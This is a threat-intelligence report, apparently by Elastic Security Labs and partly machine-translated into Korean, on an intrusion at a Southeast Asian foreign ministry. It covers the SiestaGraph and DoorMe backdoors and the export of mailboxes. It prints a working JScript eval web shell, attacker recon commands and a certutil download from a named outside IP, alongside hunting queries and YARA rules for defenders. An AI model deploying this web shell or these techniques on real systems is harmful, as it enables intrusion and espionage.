SiestaGraph: New implant uncovered in ASEAN member foreign ministry

핵심 사항

• Likely multiple threat actors are accessing and performing live on-net operations against the Foreign Affairs Office of an ASEAN member using a likely vulnerable, and internet-connected, Microsoft Exchange server. Once access was achieved and secured, the mailboxes of targeted individuals were exported.
• Threat actors deployed a custom malware backdoor that leverages the Microsoft Graph API for command and control, which we’re naming SiestaGraph.
• A modified version of an IIS backdoor called DoorMe was leveraged with new functionality to allocate shellcode and load additional implants.

서문

In early December, Elastic Security Labs observed Powershell commands used to collect and export mailboxes from an internet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations (ASEAN) member.

In spite of diverse security instrumentation observed during this activity, the threat actors were able to achieve:

• The execution of malware on Exchange Servers, Domain Controllers, and workstations
• Exfiltration of targeted user and group mailboxes
• Deploy web shells
• Move laterally to user workstations
• Perform internal reconnaissance
• Collect Windows credentials

Because the intrusion is ongoing and covers almost the entire MITRE ATT&CK framework, the analysis sections will use a timeline approach.

For a deep dive analysis of the SIESTAGRAPH, DOORME, or SHADOWPAD malware families, check out our follow on publication that covers those in detail. In addition, there are associations between this campaign and others based on other observations and 3rd party reporting.

Updated: 2/2/2023

분석

The investigation, which we’re tracking as REF2924, began with the execution of a Powershell command used to export a user mailbox. While this is a normal administrative function, the commands were executed with a process ancestry starting with the IIS Worker Process ( w3wp.exe ) as a parent process of cmd.exe , and cmd.exe executing Powershell.

These events started the investigation that later identified multiple threat actors within the contested network environment.

이 활동 클러스터에서 관찰된 첫 번째 이벤트는 11월 26, 2022 에서 도메인 컨트롤러에서 악성 파일 실행이 탐지된 것입니다. 이 때문에 Elastic Defend는 초기 침해 이후에 배포되었으며 '탐지' 모드로 배포되었을 가능성이 높습니다. 분석 과정에서 피해자가 침입을 인지하고 위협 행위자를 쫓아내려고 노력했음을 나타내는 다른 보안 계측 도구가 환경 내에서 관찰되었습니다.

Because of the multiple malware samples achieving similar goals, various DLL sideloading observations, and the presence of a likely internet-connected Exchange server; we believe that there are multiple threat actors or threat groups working independently or in tandem with each other.

11월 26일-30, 2022

Malware execution

가장 먼저 알려진 침해 증거는 11월 26, 2022 에서 도메인 컨트롤러의 **C:\ProgramData\Microsoft**에서 실행된 OfficeClient.exe라는 파일 실행으로 발생했습니다.

도메인 컨트롤러에서 OfficeClient.exe가 실행되고 10분 후, 다른 Windows 2019 서버에서 또 다른 악성 파일이 실행되었습니다. 이 파일은 Officeclient.exe라고 불리며 **c:\windows\pla**에서 실행됩니다. 11월 28, 2022, 동일한 Windows 2019 서버에서 **C:\programdata**에서 officeup.exe가 실행되었습니다.

11월 29, 2022 에서 OfficeClient.exe 파일은 Exchange 서버에서 C:\ProgramData\OfficeCore.exe로 실행되었습니다.

All three of these files ( OfficeClient.exe , Officeclient.exe , and OfficeCore.exe ) have an original PE file name of windowss.exe , which is the file name assigned at compile time. We are naming this malware family “SiestaGraph” because of the long sleep timer and the way that the malware uses the Microsoft Graph API for command and control.

As of December 8, 2022, we observed a variant of SiestaGraph in VirusTotal, uploaded from the Netherlands on October 14, 2022. SiestaGraph makes use of a .NET API library that functions as an alternative to using Microsoft Graph, which is an API to interact with Microsoft cloud, including Microsoft 365, Windows, and Enterprise Mobility + Security.

Internal reconnaissance

11월 28, 2022, 위협 행위자는 누가미 , 호스트 이름 , 작업 목록 등과 같은 표준 명령을 실행하여 내부 정찰을 수행하기 시작했습니다. 이러한 명령은 IIS 작업자 프로세스( w3wp.exe )를 cmd.exe의 상위 프로세스로 시작하여 cmd.exe가 명령을 실행하는 프로세스 조상으로 실행되었습니다.

cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&whoami

cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&hostname

cmd.exe /c cd /d C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources"&tasklist

Additional adversary reconnaissance was performed to enumerate local network assets as well as victim assets at embassies and consulates abroad. There has been no indication that this information has been subsequently exploited for additional access or information at this time.

11월 29, 2022, 위협 행위자는 다시 w3wp.exe 및 cmd.exe의 하위 프로세스로 실행되는 net user 및 net group 명령을 사용하여 도메인 사용자 및 그룹 정보를 수집하기 시작했습니다. 이 명령들은 20 넷 사용자 명령 중 두 개에/domain 구문을 추가하는 것을 잊어버려서 완전히 스크립트로 작성된 캠페인이 아니며 활성 운영자가 포함되어 있음을 확인했습니다. net user 명령에는 /domain 구문이 필요하지 않지만 20 중 두 번만 이 구문이 사용되었다는 사실은 운영자의 실수일 가능성이 높습니다. 이는 이번 캠페인에서 발견된 여러 오타 중 첫 번째 오류였습니다.

Exporting Exchange mailboxes

11월 28, 2022, 위협 행위자는 사용자 사서함을 내보내기 시작했으며, 다시 w3wp.exe 프로세스를 cmd.exe의 부모로 사용하고 마지막으로 Powershell을 사용했습니다. 위협 행위자가 Microsoft.Exchange.Management.PowerShell.SnapIn 모듈을 추가했습니다. 이 모듈은 Powershell을 사용하여 Exchange 기능을 관리하는 기능을 제공하며, 대상 외국 서비스 담당자의 사서함을 내보내고 PST 파일로 저장하는 데 사용되었습니다.

위의 예에서 받은 -gt 및 보낸 -gt 날짜는 11월 ("보다 큰"의 약자) 이후(" gt "는 "보다 큰"의 약자) 주고받은 모든 이메일로 수집 기간을 15, 2022 로 지정합니다. 타임박스는 모든 사서함에서 균일하지 않았고 이 프로세스는 여러 번 반복되었습니다. 위의 예에서 11월 28, 2022 에서 시간 상자는 11월 15, 2022 에서 현재 날짜(11월 28, 2022)까지 주고받은 모든 이메일에 대한 것이며, 12월 6, 2022 에서 메일함을 다시 내보냈는데 이번에는 마지막 내보내기 날짜인 11월 28, 2022 의 gt 값으로 내보냈습니다.

In another example in this phase, the threat actors targeted a mailbox called csirt. While this is unconfirmed, “csirt” is commonly an acronym for Cyber Security Incident Response Team.

Taking into consideration the timebox used on the csirt export, if this is the industry standard acronym of CSIRT, the intrusion could have started as early as September 1, 2022, and the threat actors were monitoring the CSIRT to identify if their intrusion had been detected.

Throughout this phase, a total of 24 mailboxes were exported.

Once the mailboxes were exported, the threat actor created a 7zip archive called 7.tmp with a password of huebfkaudfbaksidfabsdf.

Three of the mailboxes, one of which being the csirt mailbox, were archived individually. These three mailboxes were archived with a .log.rar or .log file extension.

Finally, the threat actor created a 200m 7zip archive called o.7z and added the previously created, password-protected, 7.tmp archive to it.

IIS backdoor module

11월 28, 2022 에서 svchost.exe를 사용한 iissvcs 서비스 실행을 통해 두 개의 DLL 파일, Microsoft.Exchange.Entities.Content.dll 및 iisrehv.dll이 로드되는 것을 관찰했습니다. Microsoft.Exchange.Entities.Content.dll과 iisrehv.dll은 모두 C:\Windows\system32\svchost.exe -k iissvcs 실행을 통해 Windows 서비스 호스트의 iissvcs 모듈을 사용하여 로드되었습니다. 이러한 악성 IIS 모듈은 느슨하게 DoorMe IIS 백도어를 기반으로 합니다.

For context, IIS is web server software developed by Microsoft and used within the Windows ecosystem to host websites and server-side applications. Starting on version 7.0, Microsoft extended IIS by adding a modular architecture that allows individual modules to be added or removed in order to achieve functionality depending on an environment’s needs. These modules represent individual features that the server can then use to process incoming requests.

During the post-compromise stage, the adversary used the malicious IIS module as a passive backdoor monitoring all incoming HTTP requests. Depending on a tailor-made request by the operator, the malware will activate and process commands. This approach can be challenging for organizations as there is usually low visibility in terms of monitoring and a lack of prevention capabilities on these types of endpoints. In order to install this backdoor, it requires administrator rights and for the module to be placed inside the %windir%\System32\inetsrv directory, based on the observed artifacts we believe initial access was gained through server exploitation from a recent wave of Microsoft Exchange RCE exploit usage.

The malicious module (C++ DLL) is first loaded through its export, RegisterModule. This function is responsible for setting up the event handler methods and dynamically resolving API libraries for future usage. The main functionality of the backdoor is implemented using the CGlobalModule class under the event handler OnGlobalPreBeginRequest. By overriding this event handler, the malware is loaded before a request enters the pipeline. The core functionality of the backdoor all exists in this function, including cookie validation, parsing commands, and calling underlying command functions.

The malware implements an authentication mechanism based on a specific cookie name that contains the authentication key. This malicious IIS module checks for every incoming HTTP request for the specified cookie name, and it returns a success message in case of a GET request. The GET request is used as a way to test the backdoor’s status for the operator, and it also returns back the username and hostname of the impacted machine. Commands can be passed to the backdoor through POST requests as data.

Throughout our analysis, we discovered old samples on VirusTotal relating to this backdoor. Although they have the same authentication and logic, they implement different functionalities. The cookie name used for authentication was also changed alongside the handled commands.

This observed backdoor implements four different commands, and the symbol PIPE is used to separate the command ID and its arguments.

From our analysis, it appears that this simplistic backdoor is used as a stage loader. It uses NT Windows APIs, mainly NtAllocateVirtualMemory , NtProtectVirtualMemory , and NtCreateThreadEx , to allocate the required shellcode memory and to create the executing thread.

kk2.exe

11월 30, 2022 에서 kk2.exe라는 알 수 없는 바이너리가 Exchange 서버에서 실행되었습니다. 이 글을 쓰는 시점에서 kk2.exe를 수집하지는 못했지만, 커널 모드에서 프로세스를 모니터링하고 종료하는 데 사용할 수 있는 취약한 드라이버인 mhyprot.sys를 로드하는 데 사용되었음을 알 수 있습니다. mhyprot.sys가 kk2.exe에 다운로드되거나 포함되었는지 여부는 불분명합니다.

mhyprot.sys was detected by Elastic’s open code Windows.VulnDriver.Mhyprot YARA rule, released in August 2022.

For more information on how vulnerable drivers are used for intrusions, check out the Stopping Vulnerable Driver Attacks research Joe Desimone published in September 2022.

As stated previously, we could not collect kk2.exe for analysis but it is likely that it used mhyprot.sys to escalate to kernel mode as a way to monitor, and if necessary, terminate processes. This could be used as a way of protecting an implant, or entire intrusion, from detection.

Web shells

The following section highlights multiple attempts by the threat actors to install a web shell as a back door into the environment if they are evicted. While speculative in nature, it appears that most of these attempts to load web shells failed. It is unclear what the reasons for the failures are. We’ll not cover every attempt at loading a web shell, as several of them were very similar, but we’ll highlight the shifts in approaches.

The first attempt was to use the Microsoft certutil tool to download an Active Server Pages (ASPX) file ( config.aspx ) from a remote host (185.239.70[.]229) and save it as the error.aspx page on the Exchange Control Panel’s webserver. Because this IP address is a known Cobalt Strike server, it may have been blocked by network defense architecture, leading to further attempts to overwrite error.aspx.

After attempting to use config.aspx from a Cobalt Strike C2 server, the threat actors attempted to insert Base64 encoded Javascript into a text file ( 1.txt ), use certutil to decode the Base64 encoded Javascript ( 2.aspx ), and then overwrite error.aspx with 2.aspx. This was attempted on both the Exchange Control Panel and Outlook Web Access web servers.

The Base64 encoded string decoded into the following Javascript:

<%@ Page Language="Jscript" Debug=true%>
<%
var TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';
var ZZXG=Request.Form("daad");
var VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);
eval(ZZXG, VAXN);
%

The preceding code is a simple web shell leveraging the eval Methodto evaluate JScript code sent through the POST parameter daad. Variations of this technique were attempted multiple times. Other attempts were observed to load obfuscated versions of the China Chopper and Godzilla web shells.

December 1–4, 2022

DLL side-loading

On December 2, 2022, on two Domain Controllers, we observed a new DLL ( log.dll ) being side loaded by a legitimate, but an 11-year-old, version of the Bitdefender Crash Handler executable (compiled name: BDReinit.exe ), 13802 AR.exe. Once executed, it will move to the **C:\ProgramData\OfficeDriver** directory, rename itself **svchost.exe** , and install itself as a service.

Once log.dll is loaded, it will spawn the Microsoft Windows Media Player ( wmplayer.exe ) and dllhost.exe and injects into them which triggers a memory shellcode detection.

Updated 2/2/2023: In our updated research into SIESTAGRAPH, DOORME, and SHADOWPAD, we identify _ log.dll _ as part of the SHADOWPAD malware family.

On December 2, 2022, another unknown DLL, Loader.any , was interactively executed with an Administrative account using rundll32.exe. Loader.any was observed executing two times on a Domain Controller and was then deleted interactively.

On December 3, 2022, we observed another malicious file, APerfectDayBase.dll. While this is a known malicious file, the execution was not observed. APerfectDayBase.dll is the legitimate name of a DLL in the import table of a benign-looking program, AlarmClock.exe.

This naming appears to be an attempt to make the malicious DLL look legitimate and likely to leverage AlarmClock.exe as a side-loading target. Testing has confirmed that the DLL can be side-loaded with AlarmClock.exe. While not malicious, we are including the hash for AlarmClock.exe in the Indicators table as its presence could be used purely as a side-loading vehicle for malicious DLL, APerfectDayBase.dll.

Victimology and targeting motivations

다이아몬드 모델

Elastic Security는 다이아몬드 모델을 활용하여 침입의 공격자, 기능, 인프라, 피해자 간의 높은 수준의 관계를 설명합니다. 다이아몬드 모델은 단일 인시던트에 가장 일반적으로 사용되며, 인시던트 간의 관계를 생성하는 방법으로 활동 스레딩(섹션 8)을 활용하지만, 공격자 중심(섹션 7.1.4)으로도 사용할 수 있습니다. 접근 방식을 사용하면 복잡하지만 하나의 다이아몬드를 만들 수 있습니다.

피해자학

The victim is the foreign ministry of a nation in Southeast Asia. The threat actor appeared to focus priority intelligence collection efforts on personnel and positions of authority related to the victim's relationship with ASEAN (Association of Southeast Asian Nations).

ASEAN is a regional partnership union founded in 1967 to promote intergovernmental cooperation among member states. This has been expressed through economic, security, trade, and educational cooperation with expanding international and domestic significance for partner nations. The union itself has expanded to 10 member countries with 2 more currently seeking accession. It is exerting this international influence over the development of a Regional Comprehensive Economic Partnership trade agreement with a broader periphery of member nations (16 members and 2 applicants).

Below is a list of the targeted users, the collection window(s) in which their mailboxes were exported, and the date their mailboxes were exported.

As reflected above, we observed Users 1, 5, and 7 targeted twice each indicating that the contents of their mailboxes were of particular interest. This could be the result of pre-intrusion reconnaissance or once the initial traunch of mailboxes was reviewed by the threat actor, they decided to continue collecting on those users.

Targeting motivation

There is no indication this victim would provide any direct monetary benefit to an adversary. The attack appears to be motivated by the purpose of diplomatic intelligence gathering. There are a number of potential adversaries who would find a nation’s confidential diplomatic communications related to ASEAN, and by extension the RCEP, to be highly advantageous in furthering their own regional influence, national security, and domestic goals.

If the threat actor is excluded from ASEAN trade unions and depends on foreign aid from members of those trade unions, it could find confidential diplomatic information specifically related to ASEAN useful for negotiating or renegotiating trade agreements.

ASEAN member nations are rival claimants to territorial disputes in the South China Sea (SCS). ASEAN as an organization has not produced a unified front in the SCS dispute, with some members preferring direct nation-to-nation negotiations and some wanting ASEAN to negotiate as a whole. Diplomatic information from ASEAN member nations might provide the threat actor with useful information to influence decisions and negotiations around the SCS. The threat actor's interest in ASEAN and any individual member would almost certainly be multifaceted covering government functions from immigration to agriculture, to technology, to sociopolitical considerations such as human rights.

탐지 로직

예방 규칙

• SVCHOST로 마스커레이딩할 가능성
• 신뢰할 수 없는 경로를 통한 바이너리 마스킹
• 비정상적인 디렉토리에서 프로세스 실행

탐지 규칙

• Potential Credential Access via DCSync
• Windows Service Installed via an Unusual Client
• Suspicious Microsoft IIS Worker Descendant
• Encrypting Files with WinRar or 7z
• Exporting Exchange Mailbox via PowerShell
• Windows Network Enumeration
• NTDS or SAM Database File Copied
• Suspicious CertUtil Commands

헌팅 쿼리

KQL과 EQL 모두에 대한 이벤트는 Elastic Defend 통합을 사용하는 Elastic 에이전트와 함께 제공됩니다. 헌팅 쿼리는 높은 신호 또는 오탐을 반환할 수 있습니다. 이러한 쿼리는 잠재적으로 의심스러운 행동을 식별하는 데 사용되지만 결과를 검증하려면 조사가 필요합니다.

KQL query

Using the Discover app in Kibana, the below query will identify loaded IIS modules that have been identified as malicious by Elastic Defend (even if Elastic Defend is in “Detect Only” mode).

The proceeding and preceding wildcards (*) can be an expensive search over a large number of events.

event.code : “malicious_file” and event.action : "load" and process.name : “w3wp.exe” and process.command_line.wildcard : (*MSExchange* or *SharePoint*)

EQL 쿼리

Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors similar to the SiestaGraph backdoor and the observed DLL side-loading patterns.

# Hunt for DLL Sideloading using the observed DLLs:

library where
 dll.code_signature.exists == false and
 process.code_signature.trusted == true and
 dll.name : ("log.dll", "APerfectDayBase.dll") and
 process.executable :
           ("?:\\Windows\\Tasks\\*",
            "?:\\Users\\*",
            "?:\\ProgramData\\*")

# Hunt for scheduled task or service from a suspicious path:

process where event.type == "start" and
 process.executable : ("?:\\Windows\\Tasks\\*", "?:\\Users\\Public\\*", "?:\\ProgramData\\Microsoft\\*") and
 (process.parent.args : "Schedule" or process.parent.name : "services.exe")

# Hunt for the SiestaGraph compiled file name and running as a scheduled task:

process where event.type == "start" and
 process.pe.original_file_name : "windowss.exe" and not process.name : "windowss.exe" and process.parent.args : "Schedule"

# Hunt for unsigned executable using Microsoft Graph API:

network where event.action == "lookup_result" and
 dns.question.name : "graph.microsoft.com" and process.code_signature.exists == false

YARA

Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the SiestaGraph malware implant and the DoorMe IIS backdoor.

rule Windows_Trojan_DoorMe {
    meta:
        author = "Elastic Security"
        creation_date = "2022-12-09"
        last_modified = "2022-12-15"
        os = "Windows"
        arch = "x86"
        category_type = "Trojan"
        family = "DoorMe"
        threat_name = "Windows.Trojan.DoorMe"
        reference_sample = "96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f"
    strings:
        $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }
        $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }
        $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }
        $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }
        $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 }
        $str_0 = ".?AVDoorme@@" ascii fullword
    condition:
        3 of ($seq*) or 1 of ($str*)
}

rule Windows_Trojan_SiestaGraph {
    meta:
        author = "Elastic Security"
        creation_date = "2022-12-14"
        last_modified = "2022-12-15"
        os = "Windows"
        arch = "x86"
        category_type = "Trojan"
        family = "SiestaGraph"
        threat_name = "Windows.Trojan.SiestaGraph"
        reference_sample = "50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54"
    strings:
        $a1 = "downloadAsync" ascii nocase fullword
        $a2 = "UploadxAsync" ascii nocase fullword
        $a3 = "GetAllDriveRootChildren" ascii fullword
        $a4 = "GetDriveRoot" ascii fullword
        $a5 = "sendsession" wide fullword
        $b1 = "ListDrives" wide fullword
        $b2 = "Del OK" wide fullword
        $b3 = "createEmailDraft" ascii fullword
        $b4 = "delMail" ascii fullword
    condition:
        all of ($a*) and 2 of ($b*)
}

관찰된 적의 전술 및 기법

Elastic은 MITRE ATT&CK 프레임워크를 사용하여 지능형 지속적 위협이 기업 네트워크에 대해 사용하는 일반적인 전술, 기술 및 절차를 문서화합니다.

전술

전술은 기술 또는 하위 기술의 이유를 나타냅니다. 이는 적의 전술적 목표, 즉 행동을 수행하는 이유입니다.

• 정찰
• 최초 침투
• 실행
• 지속성 유지
• 방어 회피
• Credential access
• 탐색
• 내부 확산
• 수집
• 명령 및 제어

기술/하위 기술

기술 및 하위 기술은 적군이 행동을 수행하여 전술적 목표를 달성하는 방법을 나타냅니다.

• 호스트 정보 수집
• Gather victim information
• 피해자 네트워크 정보 수집
• Gather victim org information
• Exploit public-facing application
• Command and Scripting Interpreter: Windows command-shell
• Command and Scripting Interpreter: Powershell
• 네트워크 공유 검색
• 원격 시스템 검색
• 파일 및 디렉터리 검색
• 프로세스 검색
• Remote services: SMB/Windows admin shares
• 시스템 서비스 검색
• 시스템 소유자/사용자 검색
• Hijack execution flow: DLL side-loading
• Masquerading: Masquerade task or service
• 프로세스 인젝션
• Indicator removal: File deletion
• Deobfuscate/decode files or information
• Virtualization/sandbox evasion: Time based Evasion
• OS credential dumping: NTDS
• OS credential dumping: Security Account Manager
• OS credential dumping: DCSync
• Create or modify system process: Windows service
• Scheduled task/job: Scheduled task
• Valid accounts
• Server software component: IIS components
• Server software component: Web shell
• Email collection: Local email collection
• Archive collected data: Archive via utility
• Screen capture
• Web service
• 애플리케이션 계층 프로토콜: 웹 프로토콜

참고 자료

• https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme
• https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks
• https://threatfox.abuse.ch/ioc/1023850/
• https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper
• https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell
• https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx

관찰 가능 항목

All observables are also available for download in both ECS and STIX format in a combined zip bundle.

이 연구에서는 다음과 같은 관찰 가능성에 대해 논의했습니다.